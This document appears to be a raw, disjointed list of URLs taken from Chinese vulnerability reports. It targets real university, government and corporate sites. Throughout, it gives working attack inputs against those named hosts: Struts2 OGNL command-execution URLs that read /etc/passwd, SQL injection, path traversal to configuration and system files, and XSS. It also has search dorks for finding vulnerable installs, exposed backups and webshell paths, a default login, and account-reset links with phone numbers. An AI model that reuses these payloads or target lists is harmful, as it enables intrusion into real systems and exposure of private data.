http://course.stfi.cn/skills/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://dascom.svtcc.edu.cn/suite/skills/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://dm.2144.cn/e/extend/search_ajax.php http://www.phpoa.cn http://cloud.dlink.com.cn/login.aspx http://a.gleague.com.cn http://a.gleague.com.cn/FCKeditor/editor/filemanager/connectors/test.html inurl:managerOneGgxxfb.action http://www.baidu.com/s?wd=inurl%3AmanagerOneGgxxfb.action&pn=0&oq=inurl%3AmanagerOneGgxxfb.action&tn=91553692_hao_pg&ie=utf-8 http://ecard.tjufe.edu.cn/managerOneGgxxfb.action?fbxxid=8a7b7b8739716b38013980942bf30007 http://ykt.wh.sdu.edu.cn/xykcx/managerOneGgxxfb.action?fbxxid=4a42a8b237f00d4f013801503c620003 http://ecard.jxust.cn/managerOneGgxxfb.action?fbxxid=5ad708b230ac13800130b9d6a5dd0001 http://www.ykt.sdnu.edu.cn/managerOneGgxxfb.action?fbxxid=52ac88953fc239d5013fc78d81b00001 http://ecard.sdu.edu.cn/managerOneGgxxfb.action?fbxxid=53d6b69231bd74d701321dccda080014 http://www.ecard.ldu.edu.cn/managerOneGgxxfb.action?fbxxid=4a42b0f33381c4f90133d468e6d40003 http://ecard.tyut.edu.cn/managerOneGgxxfb.action?fbxxid=40288103281f3a4c01281f7568460002 http://card.dgpt.edu.cn/managerOneGgxxfb.action?fbxxid=2c90838b33cfa83d0133d057c4ad0016 http://ecard.sdwz.cn/managerOneGgxxfb.action?fbxxid=2c918186341c2a1d013421a9de060011 http://ecard.hbmu.edu.cn/managerOneGgxxfb.action?fbxxid=5a45b1842aebd214012b5aeb89180002 http://ecard.hycollege.net/managerOneGgxxfb.action?fbxxid=40287e8627d600d40127dce2af050001 http://ecard.sjtu.edu.cn/managerOneGgxxfb.action?fbxxid=4af8bf441cd2052e011ce024bae60001 http://ecard.tjufe.edu.cn/managerOneGgxxfb.action?fbxxid=8a7b7b8739482fb301396bd58bd3000a http://localhost/ http://www.ci.gxnu.edu.cn/article/showdown.asp?soft_id=62 http://www.ci.gxnu.edu.cn/article/showdown.asp?soft_id=61 http://www.ci.gxnu.edu.cn/article/showdown.asp?soft_id=* http://www.hnnc.gov.cn,湖南农村网,多位用户密码为弱口令,其中有admin,但都权限不足,无法获得webshell: http://www.ca-ict.org/en/login.asp?action=login sud.whu.edu.cn/wp-login.php http://58.221.238.243:8808/dflzjszxcp/employee_toLogin.do http://etg.qq.com/ http://etg.qq.com/billboard/minsite/etg.shtml?fu=http%3A%2F%2Fa.paipai.com%2f%26size%3D1024x768%26time%3D0 http://zheye.cc/2248和http://zheye.cc/2250 http://zheye.cc/index.php/Home/Index/dele_address_ajax?aid=228877 http://finance.sina.com.hk/cgi-bin/forex/calculate.cgi http://db.duowan.com/zhtw/spells.php?c=11&s=393 http://db.duowan.com/zhtw/spells.php?c=11&s=165 http://drops.wooyun.org/papers/2035 http://www.zgyythy.com/manage/login.asp http://localhost/74cms_utf8/upload/plus/ajax_user.php http://xjxl.chsi.com.cn/images/photoForLQK/E59950E(51F68)B64CE040007F010008F1 http://xjxl.chsi.com.cn/images/photoForLQK/E59950E(2EBF3)B64CE040007F010008F1 http://xjxl.chsi.com.cn/images/photoForLQK/E59950E(3DC5F)B64CE040007F010008F1 http://xjxl.chsi.com.cn/images/photoForLQK/E5623F7(91022)FB37E040007F0100552A http://xjxl.chsi.com.cn/images/photoForLQK/E5623F7(61003)FB37E040007F0100552A http://xjxl.chsi.com.cn/images/photoForLQK/E5623F7(71002)FB37E040007F0100552A http://xjxl.chsi.com.cn/images/photoForLQK/E5623F7(71001)FB37E040007F0100552A http://xjxl.chsi.com.cn/images/photoForLQK/E5623F7(71000)FB37E040007F0100552A http://job.bjut.edu.cn/bjutCms/toLoginPage.action www.ca-ict.org/china-asean/en/login.asp?action=login www.ca-ict.org/new/dx_week_en/tt12.asp?ClassID=74&page=183&SpecialID= www.ca-ict.org/dx_week_en/tt12.asp?ClassID=1 http://222.223.232.226/goods/findgoodsInfo.action?goodsType1= http://ncfile.focus.cn/common/modules/bbsadm/trans_domain_app.php?page=499&app=1 http://ncfile.focus.cn/common/modules/dmc/adm/rdistnsPYpl http://ncfile.focus.cn/common/modules/dmc/votehouse_view.left.inc http://ncfile.focus.cn/common/dao/dao.tpl.php http://ncfile.focus.cn/common/admin/test.php http://ncfile.focus.cn/common/modules/bbsadm/trans_domain_app.php?page=499&app=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12%20limit%200,1--+ http://www.21education.com.cn/gynews.asp?Id=98 http://www.21education.com.cn/newsInfo.asp?id=171 http://www.21education.com.cn/AlInfo.asp?id=107 http://www.21education.com.cn/yeNewsInfo.asp?id=94 http://www.21education.com.cn/NewsInfoa.asp?id=158 http://support.chanjet.com/support.rar http://support.chanjet.com/kbm/kbmedit3.asp?iKbmID=42156 http://support.chanjet.com/kbm/kbmedit3.asp?iKbmID=42156 http://support.chanjet.com/kbm/kbmedit3.asp?iKbmID=42156 http://dir.minigame.qq.com/cgi-bin/gamevip_fetch_vip_info_mini?playerUin= http://wooyun.org/bugs/wooyun-2014-062111 http://wooyun.org/bugs/wooyun-2014-062946 http://wap.cnmo.com/mobile_para.php?title=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&productid=157026&type=1 http://www.xxrfb.gov.cn/ http://pay.wan.7k7k.com/ http://pay.wan.7k7k.com/webmanage/login.php https://202.116.1.123:8443/default.html?dc=1401785777442 http://202.116.1.160/dashboard.php?ddreset=1&sid=0796817f0e06b551 http://bbs.xgo.com.cn/user/albumpiclist_1657493_216086_1.html http://www.yiban.cn/findpass/set,即可进行密码重置了。 http://u1.huatu.com/jiangxi/wj/%EF%BD%97%EF%BD%8F%EF%BD%84%EF%BD%85.txt http://event21.dota2.com.cn//dota2/hopelight/dota2Hopelight!getTopPrize.action https://licai.baidu.com/user/0/info_repair/0?service_type=&ru=/cashdesk/0/pay/0?item_id=4,如果用户之前使用过百度钱包,进行过实名信息登记,那么身份证号码和姓名以及密保问题都会在上面明文显示。 http://biz.news.hexun.com/ssxs/default.aspx?zn=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&zt=guzhiqihuo http://biz.news.hexun.com/ssxs/stock_ifr.aspx?t=qh1401&w=920 http://biz.news.hexun.com/ssxs/list2.aspx?zt=stockyearqh1401&w=900 http://www.smrs.gov.cn/news/index.asp?new_id=7 http://www.hx2000.com.cn/ http://www.gldjyq.cn:8133/yqgl/HOME/City/default.asp?acode=4503 http://219.159.68.143/HOME/Region/default.asp?acode=450101 http://219.159.68.143/HOME/forum/default.asp?acode=4501 http://yqzb.wdjyzx.com/home/Region/default.asp?acode=371081-049 http://www.topsi.net.cn/ http://www.slin-gift.com/news_show.php?id=32 http://www.sqlmap.org www.slin-gift.com\session http://amd.sinano.ac.cn/news_show.php?id=1 http://www.sqlmap.org http://webmail.now.cn/readme.txt里面的一些信息,还有 http://webmail.now.cn/.svn/entries http://webmail.now.cn/webmail/help/.svn/entries http://webmail.now.cn/mobile/manager/.svn/entries http://webmail.now.cn/mobile/.svn/entries http://webmail.now.cn/webmail/.svn/entries http://210.192.123.172:8089/cesu/show_test_result.php?id=1401791499 http://shop.xunlei.com/test.txt http://act.shop.xunlei.com/xlrouter/,想抽个迅雷路由器玩玩!然后就开始了下面的测试! http://image.shop.xunlei.com/objects/swfupload.swf,记得某大牛说过这种可以修改后缀上传任意文件,我抄起我的菜刀就上了,各种改后缀,然后再审查元素看看,然后发现了 http://www.cclinux.com/ http://test.crazygame.cn/v2014/ http://test.crazygame.cn/v2014/user/user_my_meet_add_form.asp http://test.crazygame.cn/v2014/meet/meet_detail.asp?id=328 http://test.crazygame.cn/v2014/user/user_my_album_collection_mdy_form.asp?id=49 http://test.crazygame.cn/v2014/album/album_detail.asp?id=49 http://nubs.nju.edu.cn/1.rar http://nubs.nju.edu.cn/index.php.bak http://dm.2144.cn/comic/9275/721.html?type=z http://dm.2144.cn/comic/9275/718.html?type=z http://dm.2144.cn/comic/9275/720.html?type=z http://dm.2144.cn/comic/9275/719.html?type=z http://dm.2144.cn/comic/9275/717.html?type=z http://dm.2144.cn/comic/9275/716.html?type=z http://dm.2144.cn/comic/9275/715.html?type=z http://dm.2144.cn/comic/9275/714.html?type=z http://dm.2144.cn/hzw/search.php?keyword=a http://act.2144.cn/yinyue/mp3/down.php?f=../../../../../../../../../../../../../../../../etc/hosts www.plaj.gov.cn http://www.plaj.gov.cn/login.asp http://221.1.82.110:10001/1.rar http://221.1.82.110:10001/登录地址 inurl:ACTIONSHOWNEWS,可以搜索到好多。 http://qfoa.qfkd.com.cn/setqfkd/login.aspx http://221.193.212.49:8184/ygweb/login.jsp http://221.193.212.49:8184/ygweb/loginAction.do?Flag=look&guid=45c676a2-d7c4-48e3-8f99-3e004c6c72dc http://weipai.baidu.com/photo/community/getrelateinfo?event_id=-1 http://182.131.21.137/ccnt-apply/admin/business/preview/business-preview!lookUrlRFID.action inurl:col13/articleinfo.php?infoid= http://www.zjrzfy.gov.cn/ http://www.zjzy.gov.cn/ http://www.jsjrfy.gov.cn/ http://www.njng.gov.cn/ http://www.jsrepc.com/ http://www.sundy-whcy.com/ http://www.njlsjjjc.gov.cn/溧水纪检监察网 http://www.jzscxh.com/ http://www.jnkjj.gov.cn/江宁科技局 http://www.jszlyy.com.cn/江苏省肿瘤医院 http://cxy.jnkjj.gov.cn/江宁区产学研合作信息网 http://admin.xxx.gov.cn/general/ http://www.zjrzfy.gov.cn/col8/articleinfo.php?infoid=1088 bi.inspur.com/cwbase/BIAppCenter/Default.aspx?KeyWord=Z inurl:/Download?url=/uploadFiles http://www.qyny.gov.cn/Download?url=/uploadFiles/2011-11/1322624214093.doc http://www.syny.net/Download?url=/uploadFiles/2008-11/1227413949437.doc http://www.ldnj110.gov.cn/Download?url=/uploadFiles/2014-03/1393809650714.doc http://www.wzsnw.gov.cn/Download?url=/uploadFiles/2013-06/1371198755376.pdf http://www.goldagri.com/Download?url=/uploadFiles/2014-05/2014%CE%DE%B9%AB%BA%A6%C5%A9%B2%FA%C6%B7%B2%FA%B5%D8%C8%CF%B6%A8%D3%EB%B2%FA%C6%B7%C8%CF%D6%A4%CA%D7%B4%CE%C8%CF%D6%A4%C9%EA%B1%A8%B2%C4%C1%CF%A3%A8%D6%D6%D6%B2%D2%B5%A1%A2%D0%F3%C4%C1%D2%B5%A3%A9.doc http://www.sojump.com/wjx/manage/myask.aspx http://www.sojump.com/wjx/viewsupport.aspx?id=消息的ID号码 site:2010.ceair.com filetype:pdf site:2010.ceair.com filetype:xls site:2010.ceair.com filetype:doc http://www.ouou.com/jsp/index_mv.jsp?id=12132015 https://218.62.79.234/user/requireLogin http://www.itopdog.cn/home.php?contentid=1%20%20OR%20%60is_verify%60=1%20LIMIT%201%20--%20&ac=comment&ct=home http://www.itopdog.cn/home.php?ct=home&ac=search&q="/ www.wooyun.org http://www0.ceair.com/muecard/pages/system/login/mainFrame.jsp http://cg.chaoxing.com/ www.tourzj.gov.cn/ http://item.tourzj.gov.cn/invest/login.aspx http://item.tourzj.gov.cn/touristSites/login.aspx http://stat.tourzj.gov.cn/login.aspx http://item.tourzj.gov.cn/GeneralSubject/Login.aspx http://item.tourzj.gov.cn/leader/leaderadmin/login.aspx http://item.tourzj.gov.cn/projectitem/Travel/Travel/TravelLogin.aspx http://item.tourzj.gov.cn/projectitem/Travel/Tourism/TourismLogin.aspx http://item.tourzj.gov.cn/hotel/admin/adminlogin.aspx http://item.tourzj.gov.cn/projectitem/InfoReport/Default.aspx http://news.tourzj.gov.cn/admin/login.aspx http://cop.chanjet.com/home/verify.do?method=gotoStep2&username=[用户名 http://blog.guosen.com.cn/usercenter/infoCenter/pwdChange.jsf?AJAXREQUEST=j_id_jsp_547915581_0&formId=formId&formId%3Auname=testxsstest1%40126.com&formId%3AoldPwd=12341234&formId%3AnewPwd=qwerqwer&formId%3AconfirmPwd=qwerqwer&javax.faces.ViewState=j_id2&formId%3Asave_btn=formId%3Asave_btn& http://blog.guosen.com.cn/usercenter http://blog.guosen.com.cn/usercenter/infoCenter/customiseSetting.jsf http://blog.guosen.com.cn/usercenter/infoCenter/customiseSetting.jsf?AJAXREQUEST=j_id_jsp_1760869216_0&form_id=form_id&form_id%3Aj_id_jsp_1760869216_5=&form_id%3AavatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3AdefaultAvatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3Afour=0&form_id%3Ay=0&form_id%3Aj_id_jsp_1760869216_10=&javax.faces.ViewState=j_id1&form_id%3Aj_id_jsp_1760869216_2=form_id%3Aj_id_jsp_1760869216_2& http://blog.guosen.com.cn/usercenter/infoCenter/customiseSetting.jsf?AJAXREQUEST=j_id_jsp_1760869216_0&form_id=form_id&form_id%3Aj_id_jsp_1760869216_5=&form_id%3AavatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3AdefaultAvatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3Afour=0&form_id%3Ay=0&form_id%3Aj_id_jsp_1760869216_10=&javax.faces.ViewState=j_id1&form_id%3Aj_id_jsp_1760869216_3=form_id%3Aj_id_jsp_1760869216_3& http://blog.guosen.com.cn/usercenter/infoCenter/customiseSetting.jsf?AJAXREQUEST=j_id_jsp_1760869216_0&form_id=form_id&form_id%3Aj_id_jsp_1760869216_5=&form_id%3AavatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3AdefaultAvatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3Afour=0&form_id%3Ay=0&form_id%3Aj_id_jsp_1760869216_10=&javax.faces.ViewState=j_id1&form_id%3Aj_id_jsp_1760869216_4=form_id%3Aj_id_jsp_1760869216_4& http://blog.guosen.com.cn/usercenter/infoCenter/customiseSetting.jsf?AJAXREQUEST=j_id_jsp_1760869216_0&form_id=form_id&form_id%3Aj_id_jsp_1760869216_5=&form_id%3AavatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3AdefaultAvatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3Afour=0&form_id%3Ay=0&form_id%3Aj_id_jsp_1760869216_10=&javax.faces.ViewState=j_id1&form_id%3Aj_id_jsp_1760869216_38=form_id%3Aj_id_jsp_1760869216_38& http://blog.guosen.com.cn/usercenter/infoCenter/pwdChange.jsf http://blog.guosen.com.cn/usercenter/infoCenter/pwdChange.jsf?AJAXREQUEST=j_id_jsp_547915581_0&formId=formId&formId%3Auname=testxsstest%40126.com&formId%3AoldPwd=12341234&formId%3AnewPwd=qwerqwer&formId%3AconfirmPwd=qwerqwer&javax.faces.ViewState=j_id3&formId%3Asave_btn=formId%3Asave_btn& https://blog.guosen.com.cn/sso/login?service=http%3A%2F%2Fwww.baidu.com http://www.cmpedu.com/article/newsarticle!webarticle.do?channel_id=%279053&article_id=2003762 http://sdk.chinacache.com http://sdk.chinacache.com/login?_method=checkUsername&username=存在的一个用名 http://gs.xjtu.edu.cn/zhaos/data/upload/fujian/35994.sql http://www.joyoung.com.cn/WEB-INF/该目录下所有文件可以直接读取。 http://research.iflytek.com/wp-content/themes/twentyeleven/2013.php http://joyoung.cnstaff.com/ http://zj.zjfzb.gov.cn:9999/zfjdpt/userLogin-login.action http://eholiday.ceair.com URL:http://eholiday.ceair.com//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd URL:http://eholiday.ceair.com//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/group URL:http://eholiday.ceair.com//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/services http://hope.7k7k.com/login.html http://hope.7k7k.com/login.html?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29 http://wy.nenu.edu.cn/news/news.php?id=343 inurl:down.asp?FileName http://www.mg12333.gov.cn/down.asp?FileName=../conn.asp http://www.jxrsrc.gov.cn/down.asp?FileName=../conn.asp http://www.nxjy.net/down.asp?FileName=../conn.asp http://lxxy.cjlu.edu.cn/down.asp?FileName=../conn.asp http://gh.cjlu.edu.cn/down.asp?FileName=../conn.asp http://www.china-ta.org/web/mod/review.php?id=2 https://github.com/quake/quake.github.com/blob/master/slides/huohua/index.html http://cyjs.qiniudn.com/pois/58-78.zip(qiniudn是chanyouji的图片存储主机) http://blog.renren.com/share/366549583/10752078940 http://haolaiwu.coocaa.com/self/city.php?id= http://haolaiwu.coocaa.com/self/distinct.php?id= http://221.0.95.10:81/YANTAI/systemsetting/userLogin.action http://221.0.95.10:81/ttt/exportdata.txt http://221.0.95.10:81/ttt/exportdata1.txt http://221.0.95.10:81/ttt/exportdata2.txt http://221.0.95.10:81/ttt/exportdata9.txt http://221.0.95.10:81/ttt/xiaoye.jsp http://221.0.95.10:81/ttt/strt.jsp http://house.focus.cn/housemarket/school_arround.php?t=school_line&school_line=3 http://218.22.201.156/ http://www.xfuedu.org/xyhq/readnews.asp?id=102 http://cn.chinacache.com/cdn/admin.php?field=meeting_name&keyword=-1&province=NY&refer=0 http://202.195.176.29/pyxx/login.aspx http://jwcweb.lnpu.edu.cn:7001/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1321 http://www.cnhww.com/softdown.asp?id=1 http://www.cnhww.com/softdown.asp?id=6 http://www.cnhww.com/softdown.asp?id=2 http://www.cnhww.com/DownLoad.asp http://ued.sogou.com/wp-content/uploads/ http://pan.baidu.com/s/1c0gVKCK http://68cn.dooland.com/order_submit.php http://68cn.dooland.com/forgetpass.php http://ahvnet.dooland.com/oldmag.php?id=7950 http://ahvnet.dooland.com/subscription.php?id=1111 http://ahvnet.dooland.com/oldmag.php?p=2&id=7950 http://ahvnet.dooland.com/forgetpass.php http://ahvnet.dooland.com/order_submit.php http://sq.169ol.com/dianping/ajax.php?action=usereffect&effect=effect2&effectaction=getusers&idtype=shop&keyid=asdf http://sq.169ol.com/dianping/shop/search.php http://sq.169ol.com/phpmyadmin/ http://www.hnkj.com.cn/ inurl:newinfo.do?infoId http://www.***.gov.cn/vote/voteok2.jsp?researchId=2 http://www.a***w.gov.cn/vote/voteok2.jsp?researchId=3 http://www.***y.gov.cn/vote/voteok2.jsp?researchId=2 http://www.a***.org.cn/vote/voteok2.jsp?researchId=3 http://www.***.ah.cn/vote/voteok2.jsp?researchId=3 http://player.lstat.youku.com/config.php.bak http://uapma.yonyou.com:8060/ump/umpserver/www/login.jsp http://bbs.xunlei.com/ webshell:http://bbs.xunlei.com/config/config_ucenter.php http://businessinfo.co.uk/labs/xss/xss.swf[/flash http://businessinfo.co.uk/labs/xss/xss.swf http://businessinfo.co.uk/labs/xss/xss.swf height:100% http://www.adobe.com/go/getflash http://businessinfo.co.uk/labs/xss/xss.swf"asd http://businessinfo.co.uk/labs/xss/xss.swf"asd http://businessinfo.co.uk/labs/xss/xss.swf[/flash http://www.xxx.com/xss.swf http://idc.btwob.net/data.rar http://idc.btwob.net/333.rar http://idc.btwob.net/wwwroot.rar http://www.jixiang2003.com/wwwroot.rar www.jixiang2003.com的源码 http://www.ymdj.com.cn/ckeditor/_samples/replacebyclass.html http://zwxx.zjjyedu.org/User/manageinfos.aspx user:zdsoft pass:zdsoft http://ifts.zju.edu.cn/iftsnew/index.php?CONTENT=News&LANG=CN&action=full&page=1&id=178 www.strongsoft.net http://219.159.239.96:8088/ http://219.159.102.99:8088/为例。 http://shzh.wlfx.gov.cn/Plan/FloodPlan/FloodPlanList.aspx?readOnly=&adcd=331081001003000&filetype=156&r0.26239625721837556 http://jiwei.hebau.edu.cn/list.php?cid=5 http://www.polytheatresz.com/ http://www.polytheatresz.com/ http://www.fcchbj.com/ http://www.polytheatre.com/ http://www.dgyldjy.com/ http://www.polytheatre.com/页面最右侧有一个列表 www.ahqi.gov.cn http://www.ahqi.gov.cn:9090/console/flexbin/Main.html http://61.190.8.226:8383/ inurl:/gmis/xjgl/ http://order.gmacsaic.net/使用万能账号 http://order.gmacsaic http://order.gmacsaic http://www.eeagd.edu.cn/xyspbm/login.do http://203.208.46.145/#newwindow=1&q=inurl:web!getItem.action http://www.westarsoft.com/ http://t.ztbest.com http://t.ztbest.com/upfile/headphoto/635375688922623383.jpg/1.php http://www.tech.net.cn/web/zy_list/articleview.aspx?id=2181 http://211.156.220.102/cnpl/portal https://passport.m.jd.com/user/balance.action?sid=6880ccf8686766051c694c644297115e http://localhost/cmseasy5.5/index.php?case=union&act=register http://www.jixiang2003.net/wwwroot.rar inurl:/webhouse/query/index.aspx,搜到的都是可以利用的,得有几十家了 http://202.195.176.29/gmis/tzgg/TZGGdetail.aspx?id=182 http://59.67.75.234/Gmis/tzgg/TZGGdetail.aspx?id=182 http://202.203.225.17:8080/Gmis/tzgg/TZGGdetail.aspx?id=182 http://210.33.16.51/gmis/tzgg/TZGGdetail.aspx?id=182 http://yjs.xzmc.edu.cn:8080/gmis/tzgg/TZGGdetail.aspx?id=182 http://www.t3.com.cn/sina/src_uuid/此处填微博uid http://www.t3.com.cn/sina/src_uuid/2067274670 inurl:/website/dflz/ http://59.34.3.90/website/approve/approveSiteAction!showChartDept.action?deptcode=1&deptname=null&voteid=134 http://59.34.3.90/website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=%BD%CC%D3%FD&style=4&subType=83 http://59.34.3.90/website/approve/approveSiteAction!listNews.action?issueTypeCode=1&issueTypename=????????&style=7 http://59.34.3.90/website/approve/approveSiteAction!listApproveModel.action?action=search&department=1&forward=searchmodel&style=4 https://x.x.x.x/jddba/login/check.action https://x.x.x.x/jddba/login/check.action?redirect:$ http://developer.meizu.com/common/upload http://www.cofcorice.com/admin http://zheye.cc/index.php/Home/Index/attention_ajax?aid=1388&action=add http://zheye.cc/index.php/Home/Index/attention_ajax?aid=1388fdkjfkd&action=add http://yulujihua.tudou.com/yulujihua/comment.do?method=queryJSON&parentId=1&qstatus=1&type=2 http://lidushen.tudou.com/lidushen/admin/ http://philipshaircare.tudou.com/philipshaircare/comment.do?method=queryJSON&parentId=1&qstatus=1&type=2 http://philipshaircare.tudou.com/philipshaircare/comment.do?method=queryJSON&qstatus=1&type=1 http://www.xiu8.com/family_home?family_id=11090 http://find.yyemebed.yy.com:80/ http://find.yyemebed.yy.com:80/auth/index/处就进行uid的欺骗。事实证明那块技术哥哥忘记加验证了。而是在最后一步加了验证,补尾不补头的做法,实在难以恭维啊! http://login.alibaba-inc.com准备导入证书信息 http://zf.gpc.net.cn/ http://203.208.46.145/#filter=0&newwindow=1&q=inurl:ApproveSiteAction!findApproveGuide.action http://www.syzwfw.gov.cn/website/approve/approveSiteAction!issueListShow.action?issueTypeCode=000061&issueTypename=%B1%E3%C3%F1%B7%FE%CE%F1&specialProperty=3 http://zqas.gov.cn/website/approve/approveSiteAction!issueListShow.action?issueTypeCode=000002&issueTypename=%B1%E3%C3%F1%B7%FE%CE%F1&specialProperty=3 http://www.renhua.gov.cn/website/approve/approveSiteAction!issueListShow.action?issueTypeCode=000002&issueTypename=%B1%E3%C3%F1%B7%FE%CE%F1&specialProperty=3 http://www.syzwfw.gov.cn/website/approve/approveSiteAction!listNews.action?issueTypeCode=X_JCDT&issueTypename=%BC%E0%B2%EC%B6%AF%CC%AC&style=6 http://www.flymeal.cn/customerajax/changeaddress!delAddress.action http://www.hngl.hunan.gov.cn http://www.hngl.hunan.gov.cn/Common/UpLoadFile.aspx http://www.hngl.hunan.gov.cn/201406/20140605192048564696.aspx http://202.192.240.9/fao/dede/ URL:http://chaxin.lib.tsinghua.edu.cn/Novelty_Search/CheckNewTrack.aspx http://pan.baidu.com/s/1kT0utz5 http://prm.chanjet.com/ajax/oneuserlogin.php?name=1111【注入点】 http://prm.chanjet.com/login/forgetpswd.php?loginsys=3&orgcode=111&loginname=1111【注入点】 http://ezeip.gzwhir.com/index.aspx http://clientdispatch.10086.cn:8080/downfile/apk/CM10086_android_V1.9.0_0515.apk inurl:/page/contact/contact.php http://www.shyhsm.com/search/index.php?key=1 http://dormahk.com/search/index.php?key=1 http://www.sqlmap.org http://222.32.90.7:8080/ inurl:product/class/index.php?showtag= http://www.xxx.net/product/class/index.php?showtag=1 http://www.wjj.cc/product/class/index.php?showtag=%E5%88%86%E9%85%8D%E9 http://www.sqlmap.org www.wjj.cc\session inurl:/down/class/index.php?page=1 http://www.0734pc.cn/down/class/index.php?showtj=1 http://www.sqlmap.org www.0734pc.cn\session inurl:news/class/index.php?page=1 http://www.hope-med.com.cn//news/class/index.php?showtj=1 http://www.hope-med.com.cn//news/class/index.php?showtj=1 http://www.sqlmap.org www.hope-med.com.cn\session http://www.nanzheng.gov.cn/texteditor/include/upload.aspx http://www.nanzheng.gov.cn/texteditor/include/upload.aspx?type=File inurl:prDownLoad www.zfxxgk.bjshy.gov.cn:8090 http://vip.stock.finance.sina.com.cn/q/go.php/vIR_CustomSearch/index.phtml?sr_p=60&sprice=5&market=sz&order=avg_incpercent%7C2&p=1 http://203.208.46.145/#filter=0&newwindow=1&q=inurl:content/FileDown.jsp%3FSPATTINDEX http://gzgl.etec.edu.cn/uids/login!login.action http://cop.chanjet.com/home/verify.do?method=gotoStep3Mobile&username=(要重置的用户帐号) http://cop.chanjet.com/home/verify.do?method=gotoStep3Mobile&username=18910888726 http://cop.chanjet.com/home/verify.do?method=gotoStep3Mobile&username=18910888719 inurl:showPubList http://www.igeek.com.cn/uc_server/admin.php http://demo.a3cn.com/cpa3/index.asp http://serviceshop.lenovo.com.cn/pay inurl:/photo/class/index.php?showtj= http://www.xinwangtian.com//photo/class/index.php?showtj=1 http://www.xinwangtian.com//job/class/index.php?showtj=1 http://www.xinwangtian.com//photo/class/index.php?showtj=1 http://www.sqlmap.org www.xinwangtian.com\session http://zbird.tudou.com/zbird/script.do?method=queryList&orderBy=createTime&page=1&size=12&sort=&status=1 http://zbird.tudou.com/zbird/system/login.jsp www.sutrip.com内部管理网站时需要登陆用户名,但是,进入储存同行信息网页时无需用户名密码。 http://bbs.letv.com/uc_server/admin.php?m=user&a=login&iframe= http://ugc.moji001.com/sns/PersonalMessageList?UserID=1000000000&Version=10033002&SnsID=151&Step=20&KindID=3 http://hssra2.jlu.edu.cn/new/joyphppicnew/show.php?newarticleid=708 http://hssra2.jlu.edu.cn/new/joyphppicnew/list.php?newblockid=1 http://crms.xacin.com.cn/login!register.do http://dce.jlu.edu.cn/newindex/intro.php?id=46 http://m.analytics.126.net/OuterData/login.action http://xx/wingsoft/common/cwWsData.jsp?funcno=a example:http://jcc.ynnu.edu.cn//wingsoft/common/cwWsData.jsp?funcno=a 